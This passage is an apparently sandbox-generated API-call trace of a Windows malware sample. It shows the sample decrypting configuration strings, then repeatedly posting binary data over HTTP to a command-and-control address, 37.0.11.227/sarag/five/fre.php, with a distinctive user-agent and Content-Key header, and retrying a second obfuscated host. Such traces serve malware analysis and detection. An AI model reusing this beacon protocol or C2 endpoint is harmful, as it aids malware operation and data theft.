hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0266.928] GetProcessHeap () returned 0x690000 [0266.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0266.928] GetProcessHeap () returned 0x690000 [0266.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0266.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.929] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.937] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0266.942] GetProcessHeap () returned 0x690000 [0266.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0266.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.943] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0266.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.944] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.945] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.945] GetProcessHeap () returned 0x690000 [0266.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0266.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.948] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0266.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.950] CryptDestroyKey (hKey=0x69d628) returned 1 [0266.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.953] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0266.953] GetProcessHeap () returned 0x690000 [0266.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0266.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.957] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0266.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.959] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0266.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.960] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0266.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.961] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0266.961] GetProcessHeap () returned 0x690000 [0266.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0266.961] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0266.961] GetProcessHeap () returned 0x690000 [0266.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0266.961] socket (af=2, type=1, protocol=6) returned 0x7d8 [0266.962] connect (s=0x7d8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0266.989] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0266.989] GetProcessHeap () returned 0x690000 [0266.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0266.989] GetProcessHeap () returned 0x690000 [0266.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0266.990] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0266.991] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0266.991] GetProcessHeap () returned 0x690000 [0266.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0266.991] GetProcessHeap () returned 0x690000 [0266.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0266.992] GetProcessHeap () returned 0x690000 [0266.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0266.992] GetProcessHeap () returned 0x690000 [0266.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0266.993] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0266.994] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0266.994] GetProcessHeap () returned 0x690000 [0266.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0266.994] GetProcessHeap () returned 0x690000 [0266.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0266.994] send (s=0x7d8, buf=0x6ad508*, len=242, flags=0) returned 242 [0266.995] send (s=0x7d8, buf=0x6aba40*, len=159, flags=0) returned 159 [0266.995] GetProcessHeap () returned 0x690000 [0266.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0266.995] recv (in: s=0x7d8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0267.073] GetProcessHeap () returned 0x690000 [0267.074] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0267.074] GetProcessHeap () returned 0x690000 [0267.074] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0267.075] GetProcessHeap () returned 0x690000 [0267.075] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0267.077] GetProcessHeap () returned 0x690000 [0267.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0267.078] closesocket (s=0x7d8) returned 0 [0267.078] GetProcessHeap () returned 0x690000 [0267.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0267.078] GetProcessHeap () returned 0x690000 [0267.079] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0267.079] GetProcessHeap () returned 0x690000 [0267.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0267.080] GetProcessHeap () returned 0x690000 [0267.080] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0267.080] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1590) returned 0x7d8 [0267.091] Sleep (dwMilliseconds=0xea60) [0267.093] GetProcessHeap () returned 0x690000 [0267.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0267.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.094] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.103] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0267.111] GetProcessHeap () returned 0x690000 [0267.111] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0267.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.112] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0267.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.113] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.120] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.120] GetProcessHeap () returned 0x690000 [0267.120] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0267.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.124] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0267.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.125] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0267.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.126] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0267.126] GetProcessHeap () returned 0x690000 [0267.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0267.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.127] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.128] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.129] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.131] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.131] GetProcessHeap () returned 0x690000 [0267.131] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0267.131] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0267.131] GetProcessHeap () returned 0x690000 [0267.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0267.134] GetProcessHeap () returned 0x690000 [0267.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0267.134] GetProcessHeap () returned 0x690000 [0267.134] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0267.135] GetProcessHeap () returned 0x690000 [0267.135] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0267.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.136] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0267.151] GetProcessHeap () returned 0x690000 [0267.151] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0267.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.152] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0267.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.153] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.155] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.155] GetProcessHeap () returned 0x690000 [0267.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0267.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.156] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0267.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.157] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0267.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.159] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0267.159] GetProcessHeap () returned 0x690000 [0267.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0267.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.160] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0267.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.161] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0267.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.162] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0267.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.163] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0267.163] GetProcessHeap () returned 0x690000 [0267.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0267.164] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0267.164] GetProcessHeap () returned 0x690000 [0267.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0267.164] socket (af=2, type=1, protocol=6) returned 0x7dc [0267.164] connect (s=0x7dc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0267.193] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0267.193] GetProcessHeap () returned 0x690000 [0267.193] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0267.194] GetProcessHeap () returned 0x690000 [0267.194] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0267.194] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0267.195] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0267.195] GetProcessHeap () returned 0x690000 [0267.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0267.195] GetProcessHeap () returned 0x690000 [0267.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0267.196] GetProcessHeap () returned 0x690000 [0267.196] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0267.196] GetProcessHeap () returned 0x690000 [0267.196] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0267.197] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0267.198] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0267.198] GetProcessHeap () returned 0x690000 [0267.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0267.198] GetProcessHeap () returned 0x690000 [0267.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0267.198] send (s=0x7dc, buf=0x6ad508*, len=242, flags=0) returned 242 [0267.199] send (s=0x7dc, buf=0x6aba40*, len=159, flags=0) returned 159 [0267.199] GetProcessHeap () returned 0x690000 [0267.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0267.199] recv (in: s=0x7dc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0267.277] GetProcessHeap () returned 0x690000 [0267.277] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0267.278] GetProcessHeap () returned 0x690000 [0267.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0267.278] GetProcessHeap () returned 0x690000 [0267.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0267.278] GetProcessHeap () returned 0x690000 [0267.278] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0267.278] closesocket (s=0x7dc) returned 0 [0267.279] GetProcessHeap () returned 0x690000 [0267.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0267.279] GetProcessHeap () returned 0x690000 [0267.279] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0267.279] GetProcessHeap () returned 0x690000 [0267.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0267.280] GetProcessHeap () returned 0x690000 [0267.280] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0267.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1594) returned 0x7dc [0267.284] Sleep (dwMilliseconds=0xea60) [0267.286] GetProcessHeap () returned 0x690000 [0267.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0267.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.287] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0267.311] GetProcessHeap () returned 0x690000 [0267.311] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0267.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.321] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0267.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.322] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.323] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.323] GetProcessHeap () returned 0x690000 [0267.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0267.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.325] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0267.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.328] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0267.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.329] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0267.329] GetProcessHeap () returned 0x690000 [0267.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0267.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.330] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.332] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.333] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0267.334] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.334] GetProcessHeap () returned 0x690000 [0267.334] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0267.334] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0267.334] GetProcessHeap () returned 0x690000 [0267.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0267.335] GetProcessHeap () returned 0x690000 [0267.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0267.335] GetProcessHeap () returned 0x690000 [0267.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0267.336] GetProcessHeap () returned 0x690000 [0267.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0267.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.339] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.345] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0267.351] GetProcessHeap () returned 0x690000 [0267.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0267.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0267.353] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0267.354] LoadLibraryW 